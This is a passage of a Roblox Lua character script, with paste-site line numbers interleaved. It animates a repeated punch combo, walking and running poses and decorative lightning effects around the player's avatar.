			rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(10)), 0.2)
12546
			if Debounces.on == false then break end
12547
			rs:wait()
12548
		end
12549
		Punch()
12550
		z = Instance.new("Sound",hed)
12551
		z.SoundId = "rbxassetid://169380525"
12552
		z.Pitch = ptz[math.random(1,#ptz)]
12553
		z.Volume = 1
12554
		z:Play()
12555
		for i = 1, 10 do
12556
			rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.7,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(110)), 0.6)
12557
			larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.7,0)*CFrame.Angles(math.rad(-40),math.rad(0),math.rad(20)), 0.7)
12558
			hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-14),math.rad(-90),0), 0.4)
12559
			torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(0, math.rad(90), 0), 0.65)
12560
			lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(-10)), 0.2)
12561
			rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(10)), 0.2)
12562
			if Debounces.on == false then break end
12563
			rs:wait()
12564
		end
12565
		Punch()
12566
		z = Instance.new("Sound",hed)
12567
		z.SoundId = "rbxassetid://169380525"
12568
		z.Pitch = ptz[math.random(1,#ptz)]
12569
		z.Volume = 1
12570
		z:Play()
12571
		for i = 1, 10 do
12572
			rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.2,0.4,-.5)*CFrame.Angles(math.rad(80),math.rad(0),math.rad(-50)), 0.7)
12573
			larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.7,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(-110)), 0.7)
12574
			hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-14),math.rad(90),0), 0.4)
12575
			torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(0, math.rad(-90), 0), 0.6)
12576
			lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(-10)), 0.2)
12577
			rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(10)), 0.2)
12578
			if Debounces.on == false then break end
12579
			rs:wait()
12580
		end
12581
		Punch()
12582
		z = Instance.new("Sound",hed)
12583
		z.SoundId = "rbxassetid://169380525"
12584
		z.Pitch = ptz[math.random(1,#ptz)]
12585
		z.Volume = 1
12586
		z:Play()
12587
		for i = 1, 10 do
12588
			rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.7,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(110)), 0.6)
12589
			larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.7,0)*CFrame.Angles(math.rad(-40),math.rad(0),math.rad(20)), 0.7)
12590
			hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-14),math.rad(-90),0), 0.4)
12591
			torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(0, math.rad(90), 0), 0.65)
12592
			lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(-10)), 0.2)
12593
			rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(10)), 0.2)
12594
			if Debounces.on == false then break end
12595
			rs:wait()
12596
		end
12597
		Punch()
12598
		z = Instance.new("Sound",hed)
12599
		z.SoundId = "rbxassetid://169380525"
12600
		z.Pitch = ptz[math.random(1,#ptz)]
12601
		z.Volume = 1
12602
		z:Play()
12603
		for i = 1, 10 do
12604
			rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.2,0.4,-.5)*CFrame.Angles(math.rad(80),math.rad(0),math.rad(-50)), 0.7)
12605
			larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.7,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(-110)), 0.7)
12606
			hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-14),math.rad(90),0), 0.4)
12607
			torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(0, math.rad(-90), 0), 0.6)
12608
			lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(-10)), 0.2)
12609
			rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(10)), 0.2)
12610
			if Debounces.on == false then break end
12611
			rs:wait()
12612
		end
12613
		Punch()
12614
		z = Instance.new("Sound",hed)
12615
		z.SoundId = "rbxassetid://169380525"
12616
		z.Pitch = ptz[math.random(1,#ptz)]
12617
		z.Volume = 1
12618
		z:Play()
12619
		for i = 1, 10 do
12620
			rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.7,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(110)), 0.6)
12621
			larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.7,0)*CFrame.Angles(math.rad(-40),math.rad(0),math.rad(20)), 0.7)
12622
			hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-14),math.rad(-90),0), 0.4)
12623
			torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(0, math.rad(90), 0), 0.65)
12624
			lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(-10)), 0.2)
12625
			rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(10)), 0.2)
12626
			if Debounces.on == false then break end
12627
			rs:wait()
12628
		end
12629
		Punch()
12630
		z = Instance.new("Sound",hed)
12631
		z.SoundId = "rbxassetid://169380525"
12632
		z.Pitch = ptz[math.random(1,#ptz)]
12633
		z.Volume = 1
12634
		z:Play()
12635
		for i = 1, 10 do
12636
			rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.2,0.4,-.5)*CFrame.Angles(math.rad(80),math.rad(0),math.rad(-50)), 0.7)
12637
			larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.7,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(-110)), 0.7)
12638
			hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-14),math.rad(90),0), 0.4)
12639
			torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(0, math.rad(-90), 0), 0.6)
12640
			lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(-10)), 0.2)
12641
			rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(10)), 0.2)
12642
			if Debounces.on == false then break end
12643
			rs:wait()
12644
		end
12645
		Punch()
12646
		z = Instance.new("Sound",hed)
12647
		z.SoundId = "rbxassetid://169380525"
12648
		z.Pitch = ptz[math.random(1,#ptz)]
12649
		z.Volume = 1
12650
		z:Play()
12651
		for i = 1, 10 do
12652
			rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.7,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(110)), 0.6)
12653
			larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.7,0)*CFrame.Angles(math.rad(-40),math.rad(0),math.rad(20)), 0.7)
12654
			hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-14),math.rad(-90),0), 0.4)
12655
			torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(0, math.rad(90), 0), 0.65)
12656
			lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(-10)), 0.2)
12657
			rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(10)), 0.2)
12658
			if Debounces.on == false then break end
12659
			rs:wait()
12660
		end
12661
		Punch()
12662
		z = Instance.new("Sound",hed)
12663
		z.SoundId = "rbxassetid://169380525"
12664
		z.Pitch = ptz[math.random(1,#ptz)]
12665
		z.Volume = 1
12666
		z:Play()
12667
		for i = 1, 10 do
12668
			rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.2,0.4,-.5)*CFrame.Angles(math.rad(80),math.rad(0),math.rad(-50)), 0.7)
12669
			larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.7,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(-110)), 0.7)
12670
			hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-14),math.rad(90),0), 0.4)
12671
			torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(0, math.rad(-90), 0), 0.6)
12672
			lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(-10)), 0.2)
12673
			rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(10)), 0.2)
12674
			if Debounces.on == false then break end
12675
			rs:wait()
12676
		end
12677
		Punch()
12678
		z = Instance.new("Sound",hed)
12679
		z.SoundId = "rbxassetid://169380525"
12680
		z.Pitch = ptz[math.random(1,#ptz)]
12681
		z.Volume = 1
12682
		z:Play()
12683
		for i = 1, 10 do
12684
			rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.7,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(110)), 0.6)
12685
			larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.7,0)*CFrame.Angles(math.rad(-40),math.rad(0),math.rad(20)), 0.7)
12686
			hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-14),math.rad(-90),0), 0.4)
12687
			torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(0, math.rad(90), 0), 0.65)
12688
			lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(-10)), 0.2)
12689
			rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(10)), 0.2)
12690
			if Debounces.on == false then break end
12691
			rs:wait()
12692
		end
12693
		con1:disconnect()
12694
		Debounces.on = false
12695
		Debounces.NoIdl = false
12696
		if gp ~= nil then
12697
			gp:FindFirstChild("Torso").Velocity = hed.CFrame.lookVector * 140
12698
				for i,v in pairs(larm:GetChildren()) do
12699
					if v.Name == "asd" and v:IsA("Weld") then
12700
				v:Remove()
12701
			end
12702
		end
12703
        --[[bv = Instance.new("BodyVelocity",gp:FindFirstChild("Torso"))
12704
        bv.maxForce = Vector3.new(400000, 400000, 400000)
12705
        bv.P = 125000
12706
        bv.velocity = char.Head.CFrame.lookVector * 200]]--
12707
        hum1=nil
12708
		ht=nil
12709
        Debounces.on = false
12710
        Debounces.NoIdl = false
12711
        elseif ht == nil then wait()
12712
        Grab = false
12713
        Debounces.on = false
12714
        Debounces.NoIdl = false
12715
            end
12716
        end
12717
    end
12718
end)
12719
----------------------------------------------------
12720
mouse.KeyDown:connect(function(key)
12721
    if string.byte(key) == 52 then
12722
        char.Humanoid.WalkSpeed = 60
12723
    end
12724
end)
12725
mouse.KeyUp:connect(function(key)
12726
    if string.byte(key) == 52 then
12727
        char.Humanoid.WalkSpeed = 8
12728
    end
12729
end)
12730
-------------------------------
12731
local animpose = "Idle"
12732
local lastanimpose = "Idle"
12733
local sine = 0
12734
local change = 1
12735
local val = 0
12736
local ffing = false
12737
-------------------------------
12738
game:GetService("RunService").RenderStepped:connect(function()
12739
--[[if char.Humanoid.Jump == true then
12740
jump = true
12741
else
12742
jump = false
12743
end]]
12744
char.Humanoid.FreeFalling:connect(function(f)
12745
if f then
12746
ffing = true
12747
else
12748
ffing = false
12749
end
12750
end)
12751
sine = sine + change
12752
if jumpn == true then
12753
animpose = "Jumping"
12754
elseif ffing == true then
12755
animpose = "Freefalling"
12756
elseif (torso.Velocity*Vector3.new(1, 0, 1)).magnitude < 2 then
12757
animpose = "Idle"
12758
elseif (torso.Velocity*Vector3.new(1, 0, 1)).magnitude < 20 then
12759
animpose = "Walking"
12760
elseif (torso.Velocity*Vector3.new(1, 0, 1)).magnitude > 20 then
12761
animpose = "Running"
12762
end
12763
if animpose ~= lastanimpose then
12764
sine = 0
12765
if Debounces.NoIdl == false then
12766
if animpose == "Idle" then
12767
for i = 1, 2 do
12768
rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.62,0)*CFrame.Angles(math.rad(-6),math.rad(-6),math.rad(8)), 0.4)
12769
larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.62,0)*CFrame.Angles(math.rad(-6),math.rad(6),math.rad(-8)), 0.4)
12770
hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-14),math.rad(0),0), 0.4)
12771
torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, 0, 0) * CFrame.Angles(0, math.rad(0), math.rad(0)), 0.4)
12772
lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(0, 0, math.rad(-8)), 0.4)
12773
rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(0, 0, math.rad(8)), 0.4)
12774
end
12775
elseif animpose == "Walking" then
12776
for i = 1, 2 do
12777
rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.55,0)*CFrame.Angles(math.rad(-16),math.rad(-12),math.rad(10+2*math.cos(sine/14))), 0.2)
12778
larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.55,0)*CFrame.Angles(math.rad(-16),math.rad(12),math.rad(-10-2*math.cos(sine/14))), 0.2)
12779
hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0, 1.5, -.2) * CFrame.Angles(math.rad(-14),0,0), 0.4)
12780
torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, 0, 0) * CFrame.Angles(math.rad(-10),0, math.rad(0)), 0.05)
12781
lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(-8), 0, math.rad(-8)), 0.4)
12782
rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(-8), 0, math.rad(8)), 0.4)
12783
end
12784
elseif animpose == "Running" then
12785
for i = 1, 2 do
12786
rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.55,0)*CFrame.Angles(math.rad(-20),math.rad(-14),math.rad(8+2*math.cos(sine/14))), 0.2)
12787
larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.55,0)*CFrame.Angles(math.rad(-20),math.rad(14),math.rad(-8-2*math.cos(sine/14))), 0.2)
12788
hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0, 1.5, -.2) * CFrame.Angles(math.rad(-10),0,0), 0.4)
12789
torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, 0, 0) * CFrame.Angles(math.rad(-20),0, math.rad(0)), 0.4)
12790
lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(-12), 0, math.rad(-7)), 0.4)
12791
rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(-12), 0, math.rad(7)), 0.4)
12792
wait()
12793
end
12794
end
12795
else
12796
end
12797
end
12798
lastanimpose = animpose
12799
if Debounces.NoIdl == false then
12800
if animpose == "Idle" then
12801
change = 0.5
12802
rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.62+0.1*math.cos(sine/14),0)*CFrame.Angles(math.rad(-6),math.rad(-6),math.rad(8+2*math.cos(sine/14))), 0.4)
12803
larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.62+0.1*math.cos(sine/14),0)*CFrame.Angles(math.rad(-6),math.rad(6),math.rad(-8-2*math.cos(sine/14))), 0.4)
12804
hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-14+1*math.cos(sine/14)),math.rad(0),0), 0.2)
12805
torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, 0-0.1*math.cos(sine/14), 0) * CFrame.Angles(0, math.rad(0), math.rad(0)), 0.05)
12806
lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(0, 0, math.rad(-8-2*math.cos(sine/14))), 0.4)
12807
rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(0, 0, math.rad(8+2*math.cos(sine/14))), 0.4)
12808
elseif animpose == "Walking" then
12809
change = 1
12810
rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.55,0)*CFrame.Angles(math.rad(-16),math.rad(-12),math.rad(10+2*math.cos(sine/14))), 0.2)
12811
larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.55,0)*CFrame.Angles(math.rad(-16),math.rad(12),math.rad(-10-2*math.cos(sine/14))), 0.2)
12812
hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0, 1.5, -.2) * CFrame.Angles(math.rad(-14),0,0), 0.4)
12813
torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, 0-0.1*math.cos(sine/14), 0) * CFrame.Angles(math.rad(-10),0, math.rad(0)), 0.05)
12814
lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(-8), 0, math.rad(-8)), 0.4)
12815
rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(-8), 0, math.rad(8)), 0.4)
12816
elseif animpose == "Running" then
12817
change = 1
12818
rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.35,.4)*CFrame.Angles(math.rad(-30),math.rad(14),math.rad(-30+2*math.cos(sine/14))), 0.2)
12819
larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.2,0.55,-.4)*CFrame.Angles(math.rad(110),math.rad(0),math.rad(40-2*math.cos(sine/14))), 0.2)
12820
hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0, 1.5, .2) * CFrame.Angles(math.rad(20),math.rad(10),0), 0.4)
12821
torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, 0-0.1*math.cos(sine/14), 0) * CFrame.Angles(math.rad(-40),math.rad(-10), math.rad(0)), 0.2)
12822
lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, 0, -1.2) * CFrame.Angles(math.rad(-20), math.rad(10), math.rad(0)), 0.4)
12823
rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(-12), math.rad(10), math.rad(0)), 0.4)
12824
end
12825
end
12826
end)
12827
12828
hum.MaxHealth = 9001
12829
wait(3)
12830
hum.Health = 9001
12831
12832
function Lightning(Part0,Part1,Times,Offset,Color,Thickness,Trans) -- Lightning module
12833
    --[[Part0 = Vector3 (Start pos)
12834
		Part1 = Vector3 (End pos)
12835
		Times = number (Amount of lightning parts)
12836
		Offset = number (Offset)
12837
		Color = color (brickcolor value)
12838
		Thickness = number (thickness)
12839
		Trans = number (transparency)
12840
    ]]--
12841
    local magz = (Part0 - Part1).magnitude
12842
    local curpos = Part0
12843
    local trz = {-Offset,Offset}
12844
    for i=1,Times do
12845
        local li = Instance.new("Part", torso)
12846
		li.Name = "Lightning"
12847
		li.TopSurface =0
12848
		li.Material = "Neon"
12849
		li.BottomSurface = 0
12850
		li.Anchored = true
12851
		li.Locked = true
12852
		li.Transparency = Trans or 0.4
12853
		li.BrickColor = BrickColor.new("Really black")
12854
		li.formFactor = "Custom"
12855
		li.CanCollide = false
12856
		li.Size = Vector3.new(Thickness,Thickness,magz/Times)
12857
        local Offzet = Vector3.new(trz[math.random(1,2)],trz[math.random(1,2)],trz[math.random(1,2)])
12858
        local trolpos = CFrame.new(curpos,Part1)*CFrame.new(0,0,magz/Times).p+Offzet
12859
        if Times == i then
12860
        local magz2 = (curpos - Part1).magnitude
12861
        li.Size = Vector3.new(Thickness,Thickness,magz2)
12862
        li.CFrame = CFrame.new(curpos,Part1)*CFrame.new(0,0,-magz2/2)
12863
        else
12864
        li.CFrame = CFrame.new(curpos,trolpos)*CFrame.new(0,0,magz/Times/2)
12865
        end
12866
        curpos = li.CFrame*CFrame.new(0,0,magz/Times/2).p
12867
        game.Debris:AddItem(li,.1)
12868
    end
12869
end
12870
12871
BodyParts = {} -- Parts to emit lightning effects from
12872
for _, v in pairs(char:GetChildren()) do
12873
    if v:IsA("Part") then
12874
        table.insert(BodyParts, v)
12875
    end
12876
end
12877
12878
Bounding = {} -- Calculate the bounding boxes
12879
for _, v in pairs(BodyParts) do
12880
	local temp = {X=nil, Y=nil, Z=nil}
12881
	temp.X = v.Size.X/2 * 10
12882
	temp.Y = v.Size.Y/2 * 10
12883
	temp.Z = v.Size.Z/2 * 10
12884
	Bounding[v.Name] = temp
12885
	--table.insert(Bounding, v.Name, temp)
12886
end
12887
12888
while wait(math.random(1,5)/10) do -- Emit the Lightning effects randomly
12889
	local Body1 = BodyParts[math.random(#BodyParts)]
12890
	local Body2 = BodyParts[math.random(#BodyParts)]
12891
	local Pos1 = Vector3.new(
12892
		math.random(-Bounding[Body1.Name].X, Bounding[Body1.Name].X)/10,
12893
		math.random(-Bounding[Body1.Name].Y, Bounding[Body1.Name].Y)/10,
12894
		math.random(-Bounding[Body1.Name].Z, Bounding[Body1.Name].Z)/10
12895
)
12896
	local Pos2 = Vector3.new(
12897
		math.random(-Bounding[Body2.Name].X, Bounding[Body2.Name].X)/10,
12898
		math.random(-Bounding[Body2.Name].Y, Bounding[Body2.Name].Y)/10,
12899
		math.random(-Bounding[Body2.Name].Z, Bounding[Body2.Name].Z)/10
12900
)
12901
	local SPos1 = Body1.Position + Pos1
12902
	local SPos2 = Body2.Position + Pos2
12903
	Lightning(SPos1, SPos2, 4, 3, "Really black", .3, .56)
12904
end